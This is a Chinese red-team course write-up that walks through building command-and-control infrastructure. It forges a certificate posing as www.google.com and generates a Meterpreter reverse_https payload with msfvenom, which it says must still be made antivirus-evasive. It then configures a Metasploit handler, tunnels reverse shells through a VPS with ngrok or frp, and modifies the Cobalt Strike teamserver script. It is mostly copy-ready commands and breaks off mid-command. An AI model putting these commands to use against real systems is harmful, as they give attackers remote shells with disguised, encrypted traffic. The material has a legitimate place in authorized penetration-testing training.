文章来源|MS08067 红队培训班 第5期
本文作者:thresh(红队培训班5期学员)
MSF使用https监听
1、证书生成:
openssl的使用生成证书命令(伪造的)
代码语言:javascript复制openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com"
-keyout www.google.com.key
-out www.google.com.crt &&
cat www.google.com.key www.google.com.crt > www.google.com.pem &&
rm -f www.google.com.key www.google.com.crt2、生成 HTTPS 的 payload(生成的payload需要经过免杀处理)
代码语言:javascript复制msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.80.134 lport=7777 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem PayloadUUIDName=xyh -f exe -o payload.exe3、MSF开启监听
代码语言:javascript复制use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.80.134
set lport 7777
set handlersslcert /home/thresh/MSF/cert_file/www.google.com.pem
set stagerverifysslcert true
run连接成功
Wireshark抓包的数据是经过加密处理的
MSF使用ngrock前置
其实就是内网穿透,使用frp做映射也能实现相同的效果,内网的中的Kali可以通过VSP访问到另外一个内网中。
将本地监听的端口映射到vsp指定端口,反弹shell连接vps的端口,即可连接本地msf。
CS的使用
关于CS的使用,参考CobaltStrike 官网:https://www.cobaltstrike.com/
CobaltStrike基础学习:https://www.bilibili.com/video/BV1754y1Q7im?p=3&spm_id_from=333.1007.top_right_bar_window_history.content.click
CS-修改默认端口
默认端口为50050,修改为5555
修改配置文件:vim teamserver
代码语言:javascript复制#!/bin/bash
#
# Start Cobalt Strike Team Server
#
# make pretty looking messages (thanks Carlos)
function print_good () {
echo -e "x1B[01;32m[ ]x1B[0m $1"
}
function print_error () {
echo -e "x1B[01;31m[-]x1B[0m $1"
}
function print_info () {
echo -e "x1B[01;34m[*]x1B[0m $1"
}
# check that we're r00t
if [ $UID -ne 0 ]; then
print_error "Superuser privileges are required to run the team server"
exit
fi
# check if java is available...
if [ $(command -v java) ]; then
true
else
print_error "java is not in $PATH"
echo " is Java installed?"
exit
fi
# check if keytool is available...
if [ $(command -v keytool) ]; then
true
else
print_error "keytool is not in $PATH"
echo " install the Java Developer Kit"
exit
fi
# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
print_info "Will use existing X509 certificate and keystore (for SSL)"
else
print_info "Generating X509 certificate and keystore (for SSL)"
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX: AggressiveHeap -XX: UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
连接
CS-修改证书
默认证书文件
查看证书,默认密钥口令为123456
代码语言:javascript复制┌──(root
